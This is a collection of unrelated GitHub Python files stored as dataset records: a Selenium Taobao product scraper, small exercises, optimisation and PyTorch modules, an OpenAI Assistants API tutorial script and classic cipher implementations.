{"seq_id":"2845369683","text":"'''\ndriver.find_element_by_name()\nfinds a single element matching the criteria\ndriver.find_elements_by_name()\nfinds all elements matching the criteria'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC # expected conditions\nfrom selenium.common.exceptions import TimeoutException\nfrom pyquery import PyQuery as pq # parsing tool; XPath would work as well\nimport re\nfrom pymongo import MongoClient\n\nclient = MongoClient()\ndb = client.taobao\nhaseeset = db.haseenotebook # collection for Hasee notebook listings\nbrowser = webdriver.Chrome() # launch the Chrome browser\nwait = WebDriverWait(browser, 
10) # explicit wait timeout, in seconds\n\n\n# Open Taobao and run a search\ndef search(kd):\n    try:\n        browser.get('https://www.taobao.com/') # open the url\n        input = wait.until(\n            EC.presence_of_element_located(\n                (By.CSS_SELECTOR, \"#q\"))) # locate the search box\n        submit = wait.until(\n            EC.element_to_be_clickable((By.CSS_SELECTOR, '#J_TSearchForm > div.search-button > button'))) # locate the search button (see screenshot)\n        input.send_keys(kd) # type the keyword into the search box\n        submit.click() # click the search button\n        total = wait.until(\n            EC.presence_of_element_located((By.CSS_SELECTOR,\n                '#mainsrp-pager > div > div > div > div.total'))) # locate the total page count of the result list (see footer screenshot)\n        get_products() # call the function below to grab the items on the first result page\n        print(total.text)\n        return total.text\n    except TimeoutException:\n        return search(kd) # retry on timeout (bug fix: the keyword argument was missing here)\n\n\n# Jump to the next page\ndef next_page(page_number):\n    try:\n        input = wait.until(\n            EC.presence_of_element_located(\n                (By.CSS_SELECTOR, \"#mainsrp-pager > div > div > div > div.form > input\"))) # page-number input box\n        submit = wait.until(EC.element_to_be_clickable(\n            (By.CSS_SELECTOR, '#mainsrp-pager > div > div > div > div.form > span.btn.J_Submit')))\n        input.clear() # clear the page-number box\n        input.send_keys(page_number) # type the target page number\n        submit.click() # click the jump button\n        wait.until(EC.text_to_be_present_in_element(\n            (By.CSS_SELECTOR, '#mainsrp-pager > div > div > div > ul > li.item.active > span'),\n            str(page_number))) # current page number\n        get_products() # grab the items on this page\n    except TimeoutException:\n        next_page(page_number) # retry on timeout\n\n\n# Grab all item info on a result page and save it to the database\ndef get_products():\n    products = []\n    wait.until(EC.presence_of_element_located(\n        (By.CSS_SELECTOR, '#mainsrp-itemlist .items .item'))) # once the wait succeeds, every single item on the result page is present\n    html = browser.page_source # html source\n    doc = pq(html) # returns an HTML document object\n    # pyquery(browser.page_source) plays the same role as the response object that requests.get(url) would return\n    items = doc('#mainsrp-itemlist .items .item').items() # get every item in the item list\n    for item in items: # extract the fields from each item with pyquery\n        product = {\n            'image': item.find('.pic .img').attr('src'),\n            'price': item.find('.price').text(),\n            'deal': item.find('.deal-cnt').text()[:-3], # strip the trailing '人付款' (\"people paid\") suffix\n            'title': item.find('.title').text(),\n            'shop': item.find('.shop').text(),\n            'location': item.find('.location').text(),\n        }\n        products.append(product)\n        print(product) # print the single item's json info\n        haseeset.insert(product)\n\n\ndef main(kd):\n    total = search(kd) # total number of pages; page 1 is already handled inside search()\n    total = int(re.compile('(\\d+)').search(total).group(1))\n    for i in range(2, total + 1): # start from page 2; total + 1 so every page gets crawled\n        next_page(i)\n\n\nif __name__ == '__main__':\n    main('神舟笔记本')\n","repo_name":"yangzhaoyunfei/crawler","sub_path":"ref/1-8-使用自动化神器Selenium爬取动态网页(案例三:爬取淘宝商品).py","file_name":"1-8-使用自动化神器Selenium爬取动态网页(案例三:爬取淘宝商品).py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"41070138004","text":"def menu():\r\n    print(\"Enter 1: Laksa - $3.50\")\r\n    print(\"Enter 2: Nasi Lemak - $3.00\")\r\n    print(\"Enter 3: Popiah - $1.80\")\r\n    print(\"Enter 4: Mee Siam - $2.50\")\r\n    print(\"Enter -9: Exit\")\r\n\r\ntotal= 0\r\norder=[ ]\r\nmenu() \r\nchoice=input(\"Enter item code: \")\r\nwhile choice!=\"-9\":\r\n    if choice== \"1\":\r\n        total=total+3.50\r\n        order.append(\"Laksa\")\r\n        print(\"You have ordered Laksa - $3.50\")\r\n    elif choice==\"2\":\r\n        total=total+3.00 \r\n        order.append(\"Nasi Lemak\")\r\n        print(\"You have ordered Nasi Lemak - $3.00\") \r\n    elif choice==\"3\":\r\n        total=total+1.80 \r\n        order.append(\"Popiah\")\r\n        print(\"You have ordered Popiah - $1.80\") \r\n    elif choice==\"4\":\r\n        total=total+2.50 \r\n        order.append(\"Mee Siam\")\r\n        print(\"You have ordered Mee Siam - $2.50\") \r\n    
menu()\r\n choice=input(\"Enter item code: \")\r\nprint(order)\r\nprint(\"Total is \"+ str(total))\r\nprint(\"Completed. Thank you.\")","repo_name":"WJChoong/Exercise-Python","sub_path":"Exercise/order_food.py","file_name":"order_food.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32474076097","text":"\nfrom .solver import Solver\n\nfrom scipy.optimize._linesearch import scalar_search_armijo\nimport numpy as np\n\n\nclass PGD(Solver):\n\n def __init__(self, kwargs) -> None:\n super().__init__(kwargs)\n\n self.step_size = None\n self.init_step_size = 0.01\n self.min_step_size = 1e-10\n self.tol = 1e-8\n self.max_iter = 300\n\n def step(self):\n \"\"\"\n Perform 1 iteration of the method.\n \"\"\"\n\n # Precompute constants\n self._computeConstants()\n\n # Initialization\n if not self.step_size:\n self.step_size = self.init_step_size\n D = self.D.getDictionary()\n objective = self._objectiveFunction(D)\n\n # Iterate over all atoms\n for i_atom, atom in enumerate(self.D.yieldAtoms()):\n # print(f'\\nAtom {i_atom}')\n\n # Iterate over parameter\n for i_param in range(len(atom.parameters)):\n # print(f'\\t Parameter {i_param}')\n\n # Get atom derivative\n atom_derivative = atom.getDerivative(i_param)\n\n # Compute gradient\n gradient = self._gradPartial(\n D, atom_derivative, i_atom\n )\n\n # Get step size\n self.step_size, objective = self._ArmijoLineSearch(\n self.step_size, D, gradient, objective\n )\n # print(\n # 'Armijo step size =', self.step_size,\n # 'gradient =', gradient\n # )\n\n # Step size check: if we did not find a valid step size,\n # restart. Otherwise, update the parameters\n if (self.step_size is None) or (self.step_size < self.min_step_size):\n self.step_size = 0.01\n else:\n atom.updateParameter(\n i_param,\n atom.parameters[i_param] - self.step_size*gradient\n )\n D = self.D.getDictionary()\n\n return\n\n def _objectiveFunction(self, D):\n \"\"\"\n Compute the value of the objective function.\n\n Parameters\n ----------\n D : array, shape (n_atoms, n_channels, *atom_support)\n Current dictionary\n ztz, ztX, XtX : Constant to accelerate the computation\n when updating D.\n \"\"\"\n\n grad_D = 0.5 * self._gradD(D)\n cost = (D * grad_D).sum()\n\n return cost + 0.5*self.XtX\n\n def _gradD(self, D):\n \"\"\"\n Compute the gradient of the reconstruction loss relative to D.\n\n Parameters\n ----------\n constants : dict or None\n Constant to accelerate the computation of the gradient\n\n Returns\n -------\n grad : array, shape (n_atoms * n_times_valid)\n The gradient\n \"\"\"\n return self._tensordot_convolve(self.L, self.ztz, D) - self.ztX\n\n def _gradPartial(self, D, atom_derivative, i_atom):\n \"\"\"\n Compute the gradient of the reconstruction loss relative to the\n atom parameters using the chain rule.\n \"\"\"\n\n # Get gradient relative to D\n grad_D = self._gradD(D)\n\n # Chain rule\n grad_atom = np.dot(grad_D, atom_derivative)\n\n return grad_atom[i_atom]\n\n def _ArmijoLineSearch(self, step_size, D_hat, grad, obj):\n \"\"\"\n Armijo backtracking line search to find an adequate step size.\n \"\"\"\n\n # Local function for the line search\n def phi(step_size):\n D = D_hat - step_size*grad\n return self._objectiveFunction(D)\n\n norm_grad = np.dot(grad.ravel(), grad.ravel())\n step_size, obj_next = scalar_search_armijo(\n phi=phi,\n phi0=obj,\n derphi0=-norm_grad,\n c1=1e-5,\n alpha0=step_size,\n amin=self.min_step_size\n )\n\n return step_size, obj_next\n\n def 
_computeConstants(self):\n \"\"\"\n Precompute constants to simplify the gradient computation.\n \"\"\"\n\n Z = self.Z.getActivations()\n\n self.ztz = self._compute_ztz(Z, self.N, self.K, self.L)\n self.ztX = self._compute_ztX(Z, self.X, self.P, self.K, self.L)\n self.XtX = self._compute_XtX(self.X)\n\n @staticmethod\n def _compute_ztz(z, N, K, L):\n \"\"\"\n ztz.shape = n_atoms, n_atoms, 2 * n_times_atom - 1\n z.shape = n_trials, n_atoms, n_times - n_times_atom + 1)\n \"\"\"\n\n ztz = np.zeros(shape=(K, K, 2*L-1))\n t0 = L - 1\n for i in range(N):\n for k0 in range(K):\n for k in range(K):\n for t in range(L):\n if t == 0:\n ztz[k0, k, t0] += (z[i, k0] * z[i, k]).sum()\n else:\n ztz[k0, k, t0 + t] += (\n z[i, k0, :-t] * z[i, k, t:]).sum()\n ztz[k0, k, t0 - t] += (\n z[i, k0, t:] * z[i, k, :-t]).sum()\n return ztz\n\n @staticmethod\n def _compute_ztX(z, X, P, K, L):\n \"\"\"\n z.shape = n_trials, n_atoms, n_times - n_times_atom + 1)\n X.shape = n_trials, n_channels, n_times\n ztX.shape = n_atoms, n_channels, n_times_atom\n \"\"\"\n\n ztX = np.zeros((K, P, L))\n for n, k, t in zip(*z.nonzero()):\n ztX[k, :, :] += z[n, k, t] * X[n, :, t:t+L]\n\n return ztX\n\n @staticmethod\n def _compute_XtX(X):\n return np.dot(X.ravel(), X.ravel())\n\n @staticmethod\n def _tensordot_convolve(L, ztz, D):\n \"\"\"\n Compute the multivariate (valid) convolution of ztz and D\n\n Parameters\n ----------\n ztz: array, shape = (n_atoms, n_atoms, 2 * n_times_atom - 1)\n Activations\n D: array, shape = (n_atoms, n_channels, n_times_atom)\n Dictionnary\n\n Returns\n -------\n G : array, shape = (n_atoms, n_channels, n_times_atom)\n Gradient\n \"\"\"\n\n D_revert = D[:, :, ::-1]\n\n G = np.zeros_like(D)\n for t in range(L):\n G[:, :, t] = np.tensordot(\n ztz[:, :, t:t+L],\n D_revert,\n axes=([1, 2], [0, 2])\n )\n\n return G\n","repo_name":"axelroques/CPDL","sub_path":"cpdl/optimization/pgd.py","file_name":"pgd.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29223404771","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import init\nimport math\nimport torch.nn.backends\n\n\nclass SAPConv(nn.Module):\n def __init__(self, in_channels, out_channels, is_bias=True):\n super(SAPConv, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.is_bias = is_bias\n self.weight = Parameter(torch.Tensor(out_channels, in_channels, 3, 3))\n if self.is_bias:\n self.bias = Parameter(torch.Tensor(out_channels))\n else:\n self.bias = None\n self.reset_parameters()\n\n def reset_parameters(self):\n init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n if self.bias is not None:\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n init.uniform_(self.bias, -bound, bound)\n\n def forward(self, x):\n conv1 = F.conv2d(x,\n weight=self.weight,\n bias=self.bias,\n stride=1,\n padding=1,\n dilation=1)\n conv1 = F.relu(conv1)\n conv2 = F.conv2d(x,\n weight=self.weight,\n bias=self.bias,\n stride=1,\n padding=2,\n dilation=2)\n conv2 = F.relu(conv2)\n conv3 = F.conv2d(x,\n weight=self.weight,\n bias=self.bias,\n stride=1,\n padding=3,\n dilation=3)\n conv3 = F.relu(conv3)\n # fusion\n conv1_sum = torch.sum(conv1, dim=1, keepdim=True)\n conv2_sum = torch.sum(conv2, dim=1, keepdim=True)\n conv3_sum = torch.sum(conv3, dim=1, keepdim=True)\n attention = torch.cat([conv1_sum, conv2_sum, 
conv3_sum], dim=1)\n\n        # find the global min value\n        min_value = torch.min(attention)\n        max_value = torch.max(attention)\n\n        attention = (attention - min_value + 1e-20) / \\\n            (max_value - min_value + 1e-10)\n        enhanced_attention = -1 / (torch.log2(attention) - 1e-20)\n        # enhanced_attention = torch.exp(enhanced_attention)\n        if torch.min(enhanced_attention) < 0:\n            print(\"The attention map contains an invalid negative value!\")\n        softmax = F.softmax(enhanced_attention, dim=1)\n        lambda1, lambda2, lambda3 = softmax.split(1, dim=1)\n        return conv1.mul(lambda1) + conv2.mul(lambda2) + conv3.mul(lambda3)\n","repo_name":"TangXu-Group/Meta-hashing","sub_path":"utils/Self_Adaptive_Conv.py","file_name":"Self_Adaptive_Conv.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"}
{"seq_id":"33420531203","text":"import sys\r\n\r\n\r\nt = int(input().strip())\r\nfor a0 in range(t):\r\n    n,k = input().strip().split(' ')\r\n    n,k = [int(n),int(k)]\r\n    num = input().strip()\r\n    largest = 0\r\n    for x in range(n - k + 1):  # bug fix: + 1 so the final window is included\r\n        current = 1\r\n        for y in range(k):\r\n            current *= int(num[x+y])\r\n        if current > largest:\r\n            largest = current\r\n    print(largest)\r\n","repo_name":"thalper/Project-Euler","sub_path":"Euler8.py","file_name":"Euler8.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"40271743310","text":"import numpy as np\nimport gym\n\n\nclass DummyKitchenEnv(gym.Env):\n    # from https://github.com/google-research/relay-policy-learning/blob/4230de23d7de8081d9f648f8017e2d42fc32e5b2/adept_envs/adept_envs/franka/kitchen_multitask_v0.py#L37\n    N_DOF_ROBOT = 9\n    N_DOF_OBJECT = 21\n\n    def __init__(self, **kwargs):\n        self.params = kwargs\n\n        action_dim = (\n            8\n            if self.params['ctrl_mode'] == 'mocap' and self.params['rot_use_euler']\n            else self.N_DOF_ROBOT\n        )\n        if self.params.get('binary_gripper', False):\n            action_dim -= 1\n\n        act_lower = -1 * np.ones((action_dim,))\n        act_upper = 1 * np.ones((action_dim,))\n        self.action_space = gym.spaces.Box(act_lower, act_upper)\n\n    def __getattr__(self, attr):\n        return self.params[attr]\n\n    def _get_obs_dict(self):\n        obs_dict = {\n            'robot_qp': np.zeros(self.N_DOF_ROBOT),\n            'robot_qv': np.zeros(self.N_DOF_ROBOT),\n            'obj_qp': np.zeros(self.N_DOF_OBJECT),\n            'obj_qv': np.zeros(self.N_DOF_OBJECT),\n        }\n        if self.params['with_obs_ee']:\n            obs_dict['ee_qp'] = np.zeros(6 if self.params['rot_use_euler'] else 7)\n        if self.params['with_obs_forces']:\n            obs_dict['ee_forces'] = np.zeros(12)\n        return obs_dict\n","repo_name":"etaoxing/domain-shift-benchmark","sub_path":"dsb/envs/kitchen_shift/dummy_kitchen_env.py","file_name":"dummy_kitchen_env.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"30181241226","text":"# https://www.acmicpc.net/problem/1261\n\nfrom collections import deque\n\ndirections = [(-1, 0), (0, 1), (1, 0), (0, -1)]\n\nM, N = map(int, input().split())\nmaze = [list(map(int, input())) for _ in range(N)]\ndist = [[-1] * M for _ in range(N)]\ndist[0][0] = 0\n\n
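# Added note: this is the 0-1 BFS technique -- a deque-based shortest path for\n# graphs whose edge weights are only 0 or 1. Stepping into an empty cell costs 0\n# (appendleft), breaking a wall costs 1 (append), so the deque stays ordered by\n# distance and each cell gets its final distance the first time it is reached.\n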
queue = deque([(0, 0)])\nwhile queue:\n    y, x = queue.popleft()\n    for dy, dx in directions:\n        Y, X = y+dy, x+dx\n        if 0 <= Y < N and 0 <= X < M:\n            if dist[Y][X] == -1:\n                if maze[Y][X] == 0:\n                    dist[Y][X] = dist[y][x]\n                    queue.appendleft((Y, X))\n                else:\n                    dist[Y][X] = dist[y][x] + 1\n                    queue.append((Y, X))\n\nprint(dist[-1][-1])\n","repo_name":"imYourChoi/algorithm_study","sub_path":"graph/dijkstra/algospot.py","file_name":"algospot.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"3070974734","text":"import quandl\nimport pandas as pd\nimport pickle\n\nimport datetime\nimport matplotlib.pyplot as plt\n\napi_key = \"********\"\n\ndef state_list():\n    states = pd.read_html('https://simple.wikipedia.org/wiki/List_of_U.S._states')\n    return states[0][1][1:]\n\ndef fetch_initial_state_data():\n    main_df = pd.DataFrame()\n\n    for abbrv in state_list():\n        query = \"FMAC/HPI_\" + str(abbrv)\n        #print(\"******************* \" + query)\n        df = quandl.get(query, authtoken=api_key)\n        if main_df.empty:\n            main_df = df\n        else:\n            main_df = main_df.join(df, lsuffix='_left', rsuffix='_right')\n\n    #print(main_df.head())\n\n    \"\"\"\n    Serializing the data\n    \"\"\"\n    pickle_out = open('fiddy_states.pickle', 'wb')\n    pickle.dump(main_df, pickle_out)\n    pickle_out.close()\n\ndef load_serialized_data():\n    pickle_in = open('fiddy_states.pickle', 'rb')\n    HPI_data = pickle.load(pickle_in)\n    print(HPI_data)\n\nif __name__ == '__main__':\n    #fetch_initial_state_data()\n    load_serialized_data()\n\n\n","repo_name":"venkatram64/python_ml","sub_path":"pwork2/ex_11.py","file_name":"ex_11.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"42157500431","text":"from .Base import *;\n\nclass Summary(Base):\n\t\"\"\"\n\t\tRepository class for Summary entity.\n\t\"\"\"\n\t\n\tdef init(self):\n\t\tself.entity = ada.entities.Summary;\n\t\n\tdef status(self):\n\t\t\n\t\t# Get necessary information from current delivery\n\t\tdelivery = self.repos.deliveries.get_current();\n\t\tsummary = delivery.re_gathering.re_voting.re_order.re_summary;\n\t\tpayment = summary.re_payment;\n\t\t\n\t\t# Create default response\n\t\tresponse = 'There is no information about current summary.';\n\t\t\n\t\t# If there is information about the summary, create a detailed response\n\t\tif payment is not None:\n\t\t\tpayer = 'None' if payment.re_payer is None else payment.re_payer.nick;\n\t\t\tprice = float(payment.price)/100; #TODO: This is ugly format fix!\n\t\t\tresponse = 'Payer {}, price {}, etofa {}.';\n\t\t\tresponse = response.format(payer, price, payment.etofa);\n\t\t\n\t\t# Return a response\n\t\treturn response;\n\t\n\tdef payment(self,\n\t\t\tpayer : ada.entities.User,\n\t\t\tprice : int,\n\t\t\tetofa : datetime.datetime,\n\t\t\tlog : ada.entities.Log):\n\t\t\n\t\t# If price is not given,\n\t\t# then the payer does not exist\n\t\tif price == 0:\n\t\t\tuser = None;\n\t\t\tpayer = None;\n\t\t\n\t\t# Validating price value\n\t\tif price < 0:\n\t\t\tmsg = 'The price can not be negative!';\n\t\t\traise ValueError(msg);\n\t\telif price > 1000000:\n\t\t\tmsg = 'The price is too high!';\n\t\t\traise ValueError(msg);\n\t\t\n\t\t# Get or create payment object for current delivery\n\t\tdelivery = self.repos.deliveries.get_current();\n\t\tsummary = delivery.re_gathering.re_voting.re_order.re_summary;\n\t\tpayment = self.repos.payments.get_or_create(summary);\n\t\t\n\t\t# Update payment object\n\t\tpayment.re_payer = payer;\n\t\tpayment.price = price;\n\t\tpayment.etofa = etofa;\n\t\tpayment.re_log = log;\n\t\t\n\t\t# Save changes to database\n\t\tself.database.session.commit();\n\t\t\n\t\t# Return payment\n\t\treturn payment;\n\t\n\tdef etofa(self,\n\t\t\tetofa : 
datetime.datetime):\n\t\t\n\t\t# Get or create payment object for current delivery\n\t\tdelivery = self.repos.deliveries.get_current();\n\t\tsummary = delivery.re_gathering.re_voting.re_order.re_summary;\n\t\tpayment = self.repos.payments.get_or_create(summary);\n\t\t\n\t\t# Change current etofa\n\t\tpayment.etofa = etofa;\n\t\t\n\t\t# Save changes to database\n\t\tself.database.session.commit();\n\t\t\n\t\t# Return current payment\n\t\treturn payment;\n\t\n\tdef next(self):\n\t\t\n\t\t# Get necessary information from current delivery\n\t\tdelivery = self.repos.deliveries.get_current();\n\t\tsummary = delivery.re_gathering.re_voting.re_order.re_summary;\n\t\tpayment = summary.re_payment;\n\t\t\n\t\t# Test if all necessary information are given\n\t\tif not payment:\n\t\t\traise Exception('There is no payment!');\n\t\tif not payment.re_payer:\n\t\t\traise Exception('There is no payer!');\n\t\tif not payment.price:\n\t\t\traise Exception('There is no price!');\n\t\tif not payment.re_log:\n\t\t\traise Exception('There is no log!');\n\t\t\n\t\t# Create new adjustment\n\t\tadjustment = ada.entities.Adjustment(summary);\n\t\t\n\t\t# Change delivery stage\n\t\tdelivery.stage = ada.entities.Stage.ADJUST;\n\t\t\n\t\t# Commit all changes\n\t\tself.database.session.add(adjustment);\n\t\tself.database.session.commit();\n\t\t\n\t\treturn '';\n\n","repo_name":"Samsung/ADA","sub_path":"src/ada/services/Summary.py","file_name":"Summary.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"15424398924","text":"class cat:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n\r\n def __str__(self):\r\n return f'x: {self.x}, y: {self.y}'\r\n\r\n def __lt__(self, other):\r\n if self.x < other.x:\r\n return True\r\n else: return False\r\n\r\n # def __gt__(self, other):\r\n # if self.x > other.x:\r\n # return False\r\n\r\n\r\ndef main():\r\n a = [1, 2, 3, 4, 5, 6]\r\n b = ['q', 'w', 'e', 'r', 't', 'y']\r\n # print(f'a: {a}, {\"\".join(a)}')\r\n print(f'b: {b}')\r\n\r\n A = cat(58888, 10)\r\n B = cat(555, 1000)\r\n print(A < B)\r\n\r\n M = ['12345', '67890', '11223', '34455', '66778']\r\n for i in range(len(M)): print(M[i])\r\n for i in range(1, len(M)-1):\r\n for j in range(1, len(M[i])-1):\r\n print(M[i][j], end='')\r\n print()\r\n\r\n\r\n\r\nmain()","repo_name":"KonradRomanski/python_tasks","sub_path":"pp_test_learning.py","file_name":"pp_test_learning.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6852065587","text":"# INSTALL OPENAI IN TERMINAL\n\n# !pip install --upgrade openai\n\n# Check version:\n# !pip show openai | grep Version\n # ERROR\n\n\n# IMPORT LIBRARIES\nimport os\nimport e2b\nimport openai\nfrom openai import OpenAI\n\n# SET UP API KEY\nfrom dotenv import load_dotenv\nimport json\n\nload_dotenv()\nopenai.api_key = os.environ[\"OPENAI_API_KEY\"]\n\n# Pretty printing helper\nimport json\ndef show_json(obj):\n print(json.loads(obj.model_dump_json()))\n\n\nclient = OpenAI()\n\nassistant = client.beta.assistants.create(\n name=\"Math Tutor\",\n instructions=\"You are a personal math tutor. 
Answer questions briefly, in a sentence or less.\",\n    model=\"gpt-4-1106-preview\",\n)\nshow_json(assistant)\n\n\n\n\nMATH_ASSISTANT_ID = assistant.id  # or a hard-coded ID like \"asst-...\"\n\n\ndef submit_message(assistant_id, thread, user_message):\n    client.beta.threads.messages.create(\n        thread_id=thread.id, role=\"user\", content=user_message\n    )\n    return client.beta.threads.runs.create(\n        thread_id=thread.id,\n        assistant_id=assistant_id,\n    )\n\n\ndef get_response(thread):\n    return client.beta.threads.messages.list(thread_id=thread.id, order=\"asc\")\n\n\n\n# Create user requests in threads\n\ndef create_thread_and_run(user_input):\n    thread = client.beta.threads.create()\n    run = submit_message(MATH_ASSISTANT_ID, thread, user_input)\n    return thread, run\n\n\n# Emulating concurrent user requests\nthread1, run1 = create_thread_and_run(\n    \"I need to solve the equation `3x + 11 = 14`. Can you help me?\"\n)\nthread2, run2 = create_thread_and_run(\"Could you explain linear algebra to me?\")\nthread3, run3 = create_thread_and_run(\"I don't like math. What can I do?\")\n\n# Now all Runs are executing...\n\n\n# Get responses from runs\n\nimport time\n\n# Pretty printing helper\ndef pretty_print(messages):\n    print(\"# Messages\")\n    for m in messages:\n        print(f\"{m.role}: {m.content[0].text.value}\")\n    print()\n\n\n# Waiting in a loop\ndef wait_on_run(run, thread):\n    while run.status == \"queued\" or run.status == \"in_progress\":\n        run = client.beta.threads.runs.retrieve(\n            thread_id=thread.id,\n            run_id=run.id,\n        )\n        time.sleep(0.5)\n    return run\n\n\n# Wait for Run 1\nrun1 = wait_on_run(run1, thread1)\npretty_print(get_response(thread1))\n\n# Wait for Run 2\nrun2 = wait_on_run(run2, thread2)\npretty_print(get_response(thread2))\n\n# Wait for Run 3\nrun3 = wait_on_run(run3, thread3)\npretty_print(get_response(thread3))\n\n# Thank our assistant on Thread 3 :)\nrun4 = submit_message(MATH_ASSISTANT_ID, thread3, \"Thank you!\")\nrun4 = wait_on_run(run4, thread3)\npretty_print(get_response(thread3))\n\n\n# Update the assistant with a tool: Code interpreter\n\nassistant = client.beta.assistants.update(\n    MATH_ASSISTANT_ID,\n    tools=[{\"type\": \"code_interpreter\"}],\n)\nshow_json(assistant)\n\n\n# Ask assistant to use the tool\n\nthread, run = create_thread_and_run(\n    \"Generate the first 20 Fibonacci numbers with code.\"\n)\nrun = wait_on_run(run, thread)\npretty_print(get_response(thread))\n\n\n\nassistant = client.beta.assistants.retrieve(\"ai-developer-assistant\")\nrun = client.beta.threads.runs.create(thread_id=thread.id, assistant_id=assistant.id)\n\n# Start polling the run object\nwhile True:\n    if run.status == \"requires_action\": \n        outputs = sandbox.openai.actions.run(run) \n        if len(outputs) > 0: \n            client.beta.threads.runs.submit_tool_outputs( \n                thread_id=thread.id, run_id=run.id, tool_outputs=outputs \n            ) \n
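\n    # Added sketch (not in the original script): Assistants API runs end in terminal\n    # states such as \"completed\", \"failed\", \"cancelled\" or \"expired\", so one way to\n    # finish this loop is:\n    # elif run.status in (\"completed\", \"failed\", \"cancelled\", \"expired\"):\n    #     break\n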
\n    # ... handle rest of the `run` states\n\n    run = client.beta.threads.runs.retrieve(thread_id=thread.id, run_id=run.id)\n\n# Close the sandbox once everything is done\n# (note: `sandbox` is assumed to be an e2b sandbox created elsewhere -- it is never defined in this script)\nsandbox.close()","repo_name":"tizkovatereza/E2B_guides","sub_path":"old/openai_assistant_api_v1.1.py","file_name":"openai_assistant_api_v1.1.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"10633374291","text":"'''\nClassic Ciphers\nAuthor: PAN Zewen Xavier\n'''\n\n\ndef caesar(m: str, k: int = None) -> str:\n    '''\n    # Caesar cipher\n    @param `k`: how many positions each letter will be right-shifted in the alphabet.\n    - Encrypt: caesar(msg, k)\n    - Decrypt: caesar(encrypted, -k)\n    '''\n\n    LEN_OF_ALPHABET = 26\n    k = k or 3\n    crypted = ''\n    for c in m:\n        if c.isupper():\n            crypted += chr(((ord(c) - ord('A') + k) %\n                            LEN_OF_ALPHABET) + ord('A'))\n        elif c.islower():\n            crypted += chr(((ord(c) - ord('a') + k) %\n                            LEN_OF_ALPHABET) + ord('a'))\n        else:  # keep non-alphabet letters\n            crypted += c\n    return crypted\n\n\ndef monoalpha(m: str, mapfrom: str, mapto: str) -> str:\n    '''\n    # Monoalphabetic Substitution Ciphers\n    @param `mapfrom`: 'abc...ABC...123...'\n    @param `mapto`: 'ekl...EKL...!@#...'\n\n    - Encrypt: monoalpha(msg, 'abc...ABC...123...', 'ekl...EKL...!@#...')\n    - Decrypt: monoalpha(encrypted, 'ekl...EKL...!@#...', 'abc...ABC...123...')\n    '''\n\n    charMap = dict(zip(mapfrom, mapto))\n    return ''.join([charMap[c] if c in mapfrom else c for c in m])\n\n\ndef vigenere(m: str, key: str, encrypt: bool = True) -> str:\n    '''# Vigenere Cipher'''\n\n    # Generate vigenere cipher table\n    textSpace = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n    table = []\n    for i in range(len(textSpace)):\n        table.append(textSpace.copy())\n        textSpace.append(textSpace.pop(0))\n\n    # Extend key to have same length as msg\n    m = m.upper()\n    key = key.upper()\n    while len(key) < len(m):\n        key += key\n    key = key[:len(m)]\n\n    res = ''\n    if encrypt:\n        for i in range(len(m)):\n            k, c = key[i], m[i]  # current letter in key, current letter in msg\n            rw = ord(k)-ord('A')\n            col = ord(c)-ord('A')\n            res += table[rw][col]\n    else:\n        for i in range(len(m)):\n            k, c = key[i], m[i]  # current letter in key, current letter in msg\n            rw = ord(k)-ord('A')\n            for i in range(len(table[rw])):\n                if table[rw][i] == c:\n                    res += table[0][i]\n\n    return res\n\n\ndef otp(m: str, key: str) -> str:\n    '''\n    # One-Time Pad\n    Use the Caesar cipher to implement a one-time pad.\n    Note that all letters will become upper case within this function.\n    '''\n    def getKey(l1: str, l2: str) -> str:\n        assert l1[0].isupper()\n        assert l2[0].isupper()\n        return chr((ord(l1)-ord('A')+ord(l2)-ord('A')) % 26+ord('A'))\n\n    m, key = m.upper(), key.upper()\n\n    assert len(m) <= len(\n        key), \"Key must be no shorter than msg.\"\n    res = ''\n    for i in range(len(m)):\n        res += getKey(m[i], key[i])\n    return res\n\n\ndef bitOtp(m: str, key: str) -> str:\n    '''\n    # Bit One-Time Pad\n    Use **XOR** to encrypt and decrypt.\n    @param `m`: bit stream\n    @param `key`: bit stream, which should be no shorter \n            than `m`, only the first `len(m)` bits \n            will be used.\n    '''\n    def xor(a: str, b: str) -> str:\n        return '0' if (a == '1' and b == '1') or (a == '0' and b == '0') else '1'\n\n    assert len(key) >= len(m), 'Key should be no shorter than msg.'\n    res = ''\n    for i in range(len(m)):\n        res += xor(m[i], key[i])\n    return res\n\n
